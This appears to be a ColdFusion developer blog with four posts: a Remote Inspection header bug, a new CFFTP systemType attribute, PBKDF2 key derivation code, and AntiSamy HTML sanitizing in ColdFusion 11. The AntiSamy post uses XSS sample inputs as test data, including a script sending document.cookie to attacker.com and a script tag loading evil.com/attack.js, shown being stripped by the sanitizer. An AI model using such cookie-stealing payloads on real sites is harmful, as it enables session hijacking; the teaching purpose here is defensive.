Monday, July 27, 2015

CF11 is setting cache-control and expires headers

We have received few bugs and customer cases where CF11 is adding cache-control and expire headers as part of the response. Thereby causing few issues to the existing code.

We have investigated this issue and found that this issue is happening only when the server is installed using development profile.  And we found that in development profile we are enabling some settings on the server which will he helpful when setting environment for development purpose. The one setting which is causing this issue is Remote Inspection. Remote inspection helps in debugging & inspecting the mobile applications generated by coldfusion.


It is recommended to use Production profile or Production secure profile when installing CF for production environments. In case of production profile this setting is not enabled and its respective web.xml filters are disabled. But still in development environment some might be running some regression tests and this feature might be causing the test cases to fail.

Enabling this feature is includes cache-control headers in each and every CF response. This issue needs to be fixed but for now one can disable this feature in their development environment by unchecking the Allow Remote Inspection feature. The setting can be found at Debugging & Logging -> Remote Inspection  in CF admin. Optionally one can even disable this feature  in web.xml by commenting out the remote inspection j2ee filter. When someone again accidentally changes this setting does not make it effective when it commented out in web.xml.



Thanks,
Pavan Kumar.

CFFTP listdir fails when SYST command is disabled on remote FTP server

In this blog article we are going to discuss an issue which prevents CFFTP to display list of folders and files retrieved from FTP server when SYST command is disabled on the remote FTP server.

Let's look at why this issue is happening when SYST command is disabled. CFFTP for listing the directories and files (action="listdir") from the remote FTP server invokes ftp list command. Remote ftp server executes issued list command and sends the directory listing as part of the response. Once CFFTP receives the response it needs to perform the parsing and represent it as a listing. But the parsing of the response depends on the file list layout style of the remote FTP server. FTP provides this information through SYST command using which CFFTP knows how to parse the the listing response.

Many ftp servers disable this SYST command as it reveals the target ftp server information and its OS type.  Then in this case the request for listing will fail. But there is a way to override this behaviour of not calling SYST command with a JVM flag named org.apache.commons.net.ftp.systemType. If this jvm flag is specified with a value which specifies how to parse list command response, SYST command will not be invoked and parsing happens as specified in the JVM flag. But if the CF instance is connecting to multiple remote FTP servers hosted on different operating systems which does not allow SYST command setting this flag will result in errors which lead us to add a new attribute to the CFFTP tag.

A new attribute has been added to CFFTP tag called systemType which specifies how to parse the file list response without invoking SYST command. This attribute is available from CF11 update 3.

Possible values for the attribute are (The same values are also applicable for the JVM flag)
     WINDOWS: if specified CFFTP treats the response as Windows-Style directory listing
      UNIX:  if specified CFFTP treats the response as Unix-Style directory listing
     Also, can specify any class name which implements org.apache.commons.net.ftp.FTPFileEntryParser

The attribute can be set at multiple levels one during the connection open operation or when doing any of the FTP operation like listdir.  If this attribute is set during named ftp connection then the systemtype will be used across all ftp operations  where systemType is left unspecified.

Lets take a look at an example. For this example purpose i am using IIS ftp server and disabled the SYST command as shown in the screenshot.


then ran the below script to retrieve the files from this ftp server.
<cfscript>
ftpService = new ftp(server = "localhost", username = "pavan", password="P#$a12$3", connection="myconn");
files = ftpService.listdir(directory="/", connection="myconn", name="files");
writeDump(files);
files = ftpService.listdir(directory="/sample", connection="myconn", name="files");
writeDump(files);
</cfscript> 
Running the above script thrown the below error saying that the remote ftp server does not allow SYST command



To fix this add the systemtype attribute to the listdir operation and run the example
<cfscript>
ftpService = new ftp(server = "localhost", username = "pavan", password="P#$a12$3", connection="myconn");
files = ftpService.listdir(directory="/", connection="myconn", name="files", systemtype = "WINDOWS");
writeDump(files);
files = ftpService.listdir(directory="/sample", connection="myconn", name="files", systemtype = "WINDOWS");
writeDump(files);
</cfscript>
Now the script executes successfully and returns the listing

This code further can be optimized by specifying the systemtype at the named connection level (then no need to specify at listdir operation)

<cfscript>
ftpService = new ftp(server = "localhost", username = "pavan", password="P#$a12$3", connection="myconn", systemtype = "WINDOWS");
files = ftpService.listdir(directory="/", connection="myconn", name="files");
writeDump(files);
files = ftpService.listdir(directory="/sample", connection="myconn", name="files");
writeDump(files);
</cfscript>
 Here is the order how CFFTP looks for System Type
1) Checks if there is any systemtype specified at the tag/script. If found uses it for parsing
2) Otherwise looks at the JVM flag org.apache.commons.net.ftp.systemType if any value specified uses it.
3) As a last resort invokes SYST command if SYST command is unsuccessful listing fails otherwise listing is successful.

Thanks,
Pavan Kumar.


Wednesday, April 9, 2014

Password Based Encryption using PBKDF2 with ColdFusion 11

In this article we will be going to discuss about password based encryption and some of its standards along with how to apply the password based encryption using ColdFusion 11. If you are familiar with password based encryption and one of its standard PBKDF start reading from ColdFusion 11 & PBKDF2  

Why Password Based Encryption (PBE) is Needed


Cryptography protects data from being viewed or modified and provides a secure means of communication over otherwise insecure channels. In cryptography, Encryption is a process of converting data from plain text into a form called cipher text which makes the data cannot be easily understood by unauthorized parties. Decryption is other way process where the ciphertext text is converted back to the original plain text. Encryption is usually carried out using an encryption algorithm with the use of an encryption key which specifies how the ciphertext should be generated from the plain text. Decryption is carried out using the same algorithm with the use of the decryption key to transform the ciphertext back to its original plain text. In symmetric encryption both the encryption and decryption key are same whereas in case of asymmetric encryption both the encryption and decryption keys are different. This article mainly concerns about symmetric cryptography where both the keys are same.

It is more difficult to decrypt the ciphertext without having access to these encryption/decryption keys.  The secrecy of communication also depends how well these keys are secured and managed. Successful key management is critical to the security of a cryptosystem.  Generally the encryption/decryption keys are generated randomly using key-generation algorithms. Keys are usually a long random string bits and it can not be expected that someone will actually remember them, let alone enter them using an onscreen keyboard. Because of this keys must be managed in a safe and secure storage location. But on the other hand users are quite familiar with passwords.  There by a way to generate strong cryptographic keys based on a humanly manageable passwords is required. Also, the key sizes varies for different encryption algorithms so we also need a way to generate different cryptographic random keys of desired sizes from the given password.

Not only with the encryption algorithms password based encryption can also be used along with message authentication (MAC) algorithms where the MAC generation operation produces a message authentication code from a message using a key, and the MAC verification operation verifies the message authentication code using the same key.


What is PBKDF ?


But with the passwords there is another problem. If a key is directly constructed from the passwords one can easily use pre-generated keys formed using an exhaustive list of passwords (called dictionary) for performing a brute force attack to crack the correct password. A standard way to derive an encryption key from a password is defined in PKCS#5 (Public Key Cryptography Standard) published by RSA (the company).

The standard strengthens the approach of generating cryptographic keys from passwords by using the following approaches.

1) Salt: Using a salt while generating the encryption keys protects them from getting cracked by dictionary attacks. By using random salt multiple encryption keys can be generated based on the same password which makes attacker to generate a new key table for each salt value, making pre-computed table attacks much harder. The salt is used along with the password to derive the key , unlike the password the salt need not to be kept secret. The purpose of salt is to make the dictionary attack much harder and it is often stored along with encrypted data. The standard recommends a salt length of at least 64 bits (8 characters). The salt needs to be generated using a pseudo random number generator (PRNG). It is also strongly recommended not to reuse the same salt value for multiple instances of encryption.

2) Iteration Count:  Specified number of times the key derivation operation will be performed before returning the resulting encryption key. Iteration count makes the key derivation computation expensive when used larger iterative counts like 1000 or more.  Increasing the iteration count deliberately slows down the process of getting from a password to an actual encryption/decryption key. In cryptography we usually call this technique as Key Stretching.  The minimum recommended number of iterations is 1000.

PKCS#5 defines two key derivation functions named PBKDF1 and PBKDF2. PBKDF stands for password based key derivation function. PBKDF1 applies a hash function (MD5 or SHA-1) multiple times to the salt and password, feeding the output of each round to next one to produce the final output. The length of the final key is thus bound by the hash function output length (16 bytes for MD5, 20 bytes for SHA-1). PBKDF1 was originally designed for DES and its 16 or 20 byte output was enough to derive both a key (56 bits) and an initialization vector (64 bits) to encrypt in CBC mode. However, since this is not enough for algorithms with longer keys such as 3DES and AES, PBKDF1 shouldn't be used and is only left in the standard for backward compatibility reasons.

PBKDF2 doesn't suffer from the limitations of PBKDF1: it can produce keys of arbitrary length by generating as many blocks as needed to construct the key. To generate each block, a pseudo-random function is repeatedly applied to the concatenation of the password, salt and block index. The pseudo-random function is configurable, but in practice HMAC-SHA1/256/384/512 are used, with HMAC-SHA1 being the most common. Despite all these having a restrictive password policy further improves the security of this cryptosystem.

In general, PBKDF standard can be used in both “password secrecy” and “password integrity” modes. The password privacy mode generates a secret key for encryption and the password integrity mode generates a Message Authentication Code (MAC) key.

ColdFusion 11 & PBKDF2


ColdFusion 11 added a new function GeneratePBKDFKey to facilitate the functionality of deriving an encryption key from the given input string.  Added function returns the encryption key of desired length by taking password,algorithm,salt and iterations as function arguments. Each encryption algorithm will have its own key sizes generate the key of desired size from the password using this function and afterwards use this key in coldfusion's encrypt and decrypt functions. The syntax of the function as below.
GeneratePBKDFKey(String algorithm, String inputString, String salt, int iterations, int keysize)
Function Arguments:

algorithm
The encryption algorithm used to generate the encryption key. Supported algorithms are PBKDF2WithHmacSHA1, PBKDF2WithSHA1, PBKDF2WithSHA224,  PBKDF2WithSHA256,PBKDF2WithSHA384, PBKDF2WithSHA512
inputString
Specify the input string (password/pass-phrase) which will be used for deriving the encryption key.
salt
Random cryptographic salt. Recommended length is 64 bits (8 characters) and must be randomly generated using a pseudo random number generator.
iterations
Desired Number of Iterations to perform the cryptographic operation. The minimum recommended number of iterations is 1000.
keySize
         Desired arbitrary key length size in bits.

Example:


I am just trying to put up a simple use case where we can use PBKDF and leverage ColdFusion at the same time. Many websites while creating the user account gathers some private information of a user like email address, phone numbers, address etc and stores them in their respective data store. But In any case if the underlying data store got compromised all the information would be leaked. One way would be to encrypt all the user personal information using a single encryption key and storing it in location different from data store. But again stealing that encryption key also compromises the user personal data. In this case we can use the user's login password to derive the encryption key and encrypt the user's personal data using the same.

In this example we will use AES 192 bit encryption for encrypting the user email address and the encryption key derived from the password will be fed to encryption process. While decrypting the data the same encryption key will be derived and fed to decryption to successfully get the data back.  In real, it can be any piece of data or any file we want to encrypt, here i am just using it as email address.  Before start encrypting/decrypting the data generate a salt for that user and store it in some data store.  I have created a CFC component (PBECrypto.cfc) which does encryption and decryption of given data using the supplied password.

component
{
 // Hardcoding the below settings create a constructor to accept these settings
 This.iterations = 2000;
 This.desiredKeyLength = 192;
 This.pbkdfAlgorithm = "PBKDF2WithHmacSHA1";
 This.saltLength = 16;// 16 * 8 = 128 bit salt
 This.encryptionAlgorithm = "AES";
 This.outputEncoding = "BASE64";

 // Generate the encryption key from the given password
 // returns generated salt for storing and also returns the encryption key
 
 private string function generateEncryptionKey(required string password, required string salt)
 {
  if(Len(Trim(password)) != 0 && Len(Trim(salt)) != 0)
  {
   return generatePBKDFKey(This.pbkdfAlgorithm, Trim(password), Trim(salt), This.iterations, 
                           This.desiredKeyLength);
  }
  throw("Invalid Password or Salt");
 }
 
 public string function generateRandomSalt()
 {
  var lowerAlphabets = "abcdefghijklmnopqrstuvwxyz";
  var upperAlphabets = uCase(lowerAlphabets);
  var numbers = "0123456789";
  
  var saltSpace = lowerAlphabets & upperAlphabets & numbers;
  var salt = "";
  for(var i = 0; i < This.saltLength; i++)
  {
   salt = salt & saltSpace.charAt(RandRange(0, Len(saltSpace) - 1, "SHA1PRNG"));
  }
  return salt;
 }
 
 public string function encryptData(required string inputData, required string password, 
                                    required string salt)
 {
  var encryptionKey = generateEncryptionKey(password, salt);
  return encrypt(inputData, encryptionKey, This.encryptionAlgorithm, This.outputEncoding);
 }
 
 public string function decryptData(required string encryptedData, required string password, 
                                    required string salt)
 {
  // regenerate the encryption key to decrypt the data
  var decryptionKey = generateEncryptionKey(password, salt);
  return decrypt(encryptedData, decryptionKey, This.encryptionAlgorithm, This.outputEncoding);
 }
 
}
The following code snippet uses the PBECrypto.cfc to encrypt the given email address using the password received over a form. Before encrypting a salt must be generated for use with the PBKDF2.
        
     <cfscript>
        crypto = new PBECrypto();
        salt = crypto.generateRandomSalt();
        // Add your own logic to store the salt specific to the user.
        // Also assuming password & email address are received over a form from the user
        encryptedEmailAddress = crypto.encryptData(form.emailAddress,form.password,salt);
       // Store the encrypted email address in the store.
     </cfscript>

Now any time we can decrypt the email address if user supplies the password. The below snippet does the same.
<cfscript>
 // get the encrypted mail address and salt from the data store
 crypto = new PBECrypto();
 // Also assuming password & email address are received over a form from the user
 emailAddress = crypto.decryptData(encryptedEmailAddress, form.password,salt);
</cfscript>

In this way PBKDF makes it possible to encrypt and decrypt without storing the encryption keys but by deriving them from a given input string (possibly we call password). Also use a sufficiently long randomly generated salt and high iteration count when deriving key from the password.

References:
http://csrc.nist.gov/publications/nistpubs/800-132/nist-sp800-132.pdf
http://tools.ietf.org/html/rfc2898
http://en.wikipedia.org/wiki/PBKDF2

Using Antisamy Framework with ColdFusion 11

AntiSamy is an OWASP API for sanitizing the HTML/CSS input. ColdFusion 11 provides HTML/CSS sanitation functions which does its job based on the given AntiSamy policy files. If you are familiar with AntiSamy framework, skip to section Integration with ColdFusion.

Need for AntiSamy:

Cross-site scripting (XSS) is one of the most common and prevalent security vulnerability found in web applications. XSS can leverage the vulnerabilities in the web application code which allows attacker to inject and execute malicious code(javascript) into the end-user browser. Some of the serious threats by XSS includes session hijacking by stealing authentication information such as cookies, stealing sensitive data loaded in the web page and performing operations on behalf of the victim etc.

XSS vulnerabilities can be classified into three types – Firstly, DOM based which exists in the clients web page, Secondly; on-Persistent or Reflected is when malicious input supplied is displayed back onto the screen after returning back from the server. And finally the most dangerous XSS vulnerability - Persistent or Second Order or Stored XSS wherein the malicious data supplied is stored in the persistent storage or database. One of the primary attack vector for XSS is not having proper validation/escaping mechanisms in place. To defend such type attacks several encoding/escaping mechanisms need to be used depending on the place where the input needs to be placed in the HTML. ColdFusion provides several encoding/escaping functions which helps in validating the input and prevents from many forms of XSS.

In many websites where application developers wishes to provide an option of posting HTML markup so that users can post formatted and interactive data. In that instance encoding/escaping cannot performed on the posted HTML markup as the input needs to be rendered in the browser. Forums & blogs are places where content posted from one user will be displayed back to other website users. There by not encoding/escaping the unverified input definitely opens up new possibilities for XSS.  One can use markup parsers such as BBCode and WikiText which provides alternate set of markup tags similar to HTML. These markup parsers converts these set of tags to equivalent HTML. These parsers can effectively whitelist the allowed formatting tag but using this we can not leverage HTML and forces user to learn new language. 

One last option could be to devise an XSD schema file by defining list of allowed html tags and attributes. Convert all the given HTML input to XML and then verify the xml using the XSD schema file. It provides a flexible implementation, whitelisting of tags. But the problem with XSD schema validation is it provides no response or error message to the user and XSD needs to be created for all HTML elements.

AntiSamy Framework:

AntiSamy solves the problem of allowing HTML content and also protecting the application from possible attacks like XSS. AntiSamy is one such framework which can sanitize/validate the given input markup which can contain HTML, CSS according to a given policy file. AntiSamy is an OWASP Open source API that will allow user submitted HTML/CSS and limits the potential malicious content to get through. AntiSamy follows the whitelist approach to get the clean HTML/CSS output markup. Also, it provides user friendly error messages to let the user know what HTML, validation or security errors existed.

AntiSamy policy file is an XML file which defines set of rules like below:

  • Which HTML tags needs to be removed, filtered, validated or encoded.
  • Validation rules can be written for HTML tag attribute values using regular expressions and constant values
  • CSS parsing rules can be written to validate each CSS property individually using regular expressions and constant values.    

AntiSamy just validates/sanitizes the input according to the given policy file the protection always depends how strict the policy file is written. For more information on AntiSamy and visit OWASP AntiSamy Project page https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project Check out the AntiSamy developer guide for understanding policy files and how to define them according to the requirement.

AntiSamy uses NekoHTML and the given policy file for validating the given HTML/CSS input markup. NekoHTML is a simple HTML scanner and tag balancer that enables application programmers to parse HTML documents and access the information using standard XML interfaces. The parser can scan HTML files and "fix up" many common mistakes that human (and computer) authors make in writing HTML documents. NekoHTML adds missing parent elements; automatically closes elements with optional end tags; and can handle mismatched inline element tags. After reading the input using NekoHTML antisamy builds a DOM tree out of it then validates all of its nodes with the given policy file.

AntiSamy provides the following boilerplate policy files that you can use (can be downloaded from OWASP project page) and further can be modified to meet your project requirements.
  • antisamy-slashdot.xml - This policy file only allows strict text formatting, and may be a good choice if users are submitting HTML in a comment thread.
  • antisamy-ebay.xml – This policy file gives the user a little bit of freedom, and may be a good choice if users are submitting HTML for a large portion of a page.
  • antisamy-myspace.xml – This policy file gives the user a lot of freedom, and may be a good choice if users are submitting HTML for an entire page. 
  • antisamy-tinymce.xml - This policy file only allows text formatting, and may be a good choice if users are submitting HTML to be used in a blog post. 
  • antisamy-anythinggoes.xml – A very dangerous policy file, this will allow all HTML, CSS and JavaScript. You shouldn’t use this in production.This policy file allows every single HTML and CSS. Not for production use.
When to use AntiSamy:

If you are accepting normal text data from the user use the encoding functions of ESAPI provided by coldfusion for validating and displaying them in the web browser. ColdFusion provides the following list of functions for this purpose:

encodeForHTML, encodeForHTMLAttribute, encodeForCSS, encodeForJavaScript and encodeForURL

If you accept HTML markup from the user use the antisamy functions provided by ColdFusion 11.  Before planning to use antisamy, think which tags, attributes and css rules you need. Define the required regular expressions, constant literals for the allowed values in an attribute. If your requirement matches with one of the example policy files given by antisamy modify them so that they can meet your requirement. Devise the policy rules according to your requirements and at the same time keeping XSS in mind. 
Integration with ColdFusion:

ColdFusion 11 added new methods that can sanitize/validate the input based on the given AntiSamy policy file. ColdFusion 11 ships a basic AntiSamy policy file which is fairly permissive. This policy file allows most HTML elements, and may be useful if users are submitting full HTML pages. Two functions isSafeHTML and getSafeHTML were added to work with antisamy policy

Function isSafeHTML can be used to validate whether the provided input string is according to the rules defined in the AntiSamy policy. getSafeHTML can be used to get the clean html or the policy violation errors (what wrong went with the input) as per the policy.
getSafeHTML(unsafeHTML [, policyFile], throwOnError])
isSafeHTML(unsafeHTML [, policyFile])
unsafeHTML
     The HTML input markup text to sanitize
policyFile (Optional)
     Specify the path to the AntiSamy policy file. Given path can be an absolute path or a relative to the Application.cfc/cfc.

throwOnError (Optional)
      If set to true and given input violates the allowed HTML rules specified in the policy file an exception will be thrown. The exception message contains the list of violations raised because of the input. If set to false ignores the exception returns the HTML content filtered, cleaned according to the policy rules. Defaults to false.
As you see the policy file for these functions is optional. An AntiSamy policy file can be specified at function, application and server levels. The default server level AntiSamy policy file antisamy-basic.xml can be found at <CF_HOME>\lib\antisamy-basic.xml. To specify the policy file at application level set the application setting this.security.antisamypolicy value to the location of policy file. If no AntiSamy file location is supplied to functions ColdFusion checks if any policy file configured at application level. If configured uses it otherwise uses the server level AntiSamy policy file.
Application.cfc
component
{
    this.security.antisamypolicy = "antisamy.xml"; // Path can be absolute or relative to the application cfc path.
}
Here is an example showing how to use these functions

Examples: 

In this example we will be using the policy file antisamy-slashdot.xml from OWASP. The policy file strictly allows only <b> <i> <p> <br> <a> <ol> <ul> <li> <dl> <dt> <dd> <em> <strong> <tt> <blockquote> <div> <ecode> <quote> tags and no other css tags are allowed. isSafeHTML validates the input according to policy returns true or false and getSafeHTML sanitizes the input by filtering out and returns the clean HTML markup. As these are examples i am using static text input but when using these functions replace them with relevant form variables.

<cfset inputHTML = "<script>function geturl(){return 'http://attacker.com?cookie='+document.cookie;}</script><b>You have won an IPAD.</b><a href='javascript:geturl()'>Click here to cliam the prize</a>">


<!--- Example1 Check whether input is according to policy rules --->

<cfset isSafe = isSafeHTML(inputHTML, "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>

<!--- Example2 Check whether input is according to policy rules --->
<cfset anotherInput = "<div><b>Hello World!!</b><br/>lorem ipsum lorem ipsum</div>">

<cfset isSafe = isSafeHTML(anotherInput , "C:\antisamy-slashdot.xml")>

<cfoutput>is Safe HTML: #isSafe#</cfoutput>
<!--- Example 3: Get Safe HTML By filtering out invalid input using the server level policy antisamy-basic.xml when application level setting is not specified---> 

<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput> 
  Thanks for submitting the content #safeHTML# <br/> 
</cfoutput> 

<!--- Example 4: Get Safe HTML when no violations were present---> 
<cftry> 
  <cfset safeHTML = getSafeHTML(inputHTML, "C:\antisamy-slashdot.xml", true)> 
     <cfoutput> 
   Thanks for submitting the content #safeHTML# <br/> 
 </cfoutput> 
 <cfcatch type="application"> 
     <cfoutput>Invalid Input markup. Please correct the below errors then submit the input again <br/><br/>#cfcatch.details#</cfoutput> 
 </cfcatch>
 </cftry>
<!--- Example 5: shows how antisamy fixes up invalid HTML (end </p> tag is missing) --->
<cfset inputHTML = "<p>This is <b onclick=“alert(bang!)”>so</b> cool!!<img src=“http://example.com/logo.jpg”><script src=“http://evil.com/attack.js”>">
<cfset safeHTML = getSafeHTML(inputHTML, "",false)> 
<cfoutput>#safeHTML#</cfoutput> 

AntiSamy-slashdot policy configured not to allow script tags, executing javascript from anchor tag href attribute there by the input is considered as unsafe. In example1 isSafeHTML returns No. In example 2 the given input contains only div and b tags which are allowed by the policy returns Yes.

<!-- copied parts from the antisamy-slashdot.xml -->

<regexp name="onsiteURL" value="([\p{L}\p{N}\\/\.\?=\#&amp;;\-_~]+|\#(\w)+)">
<regexp name="offsiteURL" value="(\s)*((ht|f)tp(s?)://|mailto:)[\p{L}\p{N}]+[~\p{L}\p{N}\p{Zs}\-_\.@\#\$%&amp;;:,\?=/\+!\(\)]*(\s)*">

<regexp-list>
<regexp name="onsiteURL">
<regexp name="offsiteURL">
</regexp></regexp></regexp-list>

<tag-rules>
<!--  Tags related to JavaScript  -->
<tag action="remove" name="script">

<!--  Anchor and anchor related tags  -->
<tag action="validate" name="a">
<attribute name="href" oninvalid="filterTag">
Example 3 shows how to get clean HTML by filtering out the violations as per the policy. Example 3 gives the output "Thanks for submitting the content You have won an IPAD. Click here to cliam the prize". Script tags were removed from the input and in the given input anchor tag contains an invalid value in href attribute there by it filtered out the anchor tag but keeping the content inside of it. As the <b> tags allowed it was kept as it is.

 Example 4 shows how to get the user friendly policy violation messages using getSafeHTML. Example 4 gives the output "The script tag is not allowed for security reasons. This tag should not affect the display of the input. The a tag contained an attribute that we could not process. The href attribute had a value of "javascript:geturl()". This value could not be accepted for security reasons. We have chosen to filter the a tag in order to continue processing the input.". Example 5 shows how getSafeHTML fixes up the invalid HTML.It gives the output as "<p>This is <b>so</b> cool!!</p>" by fixing the end paragraph (p) tag.

Furthur Reading:

https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project

https://code.google.com/p/owaspantisamy/downloads/list
http://nekohtml.sourceforge.net/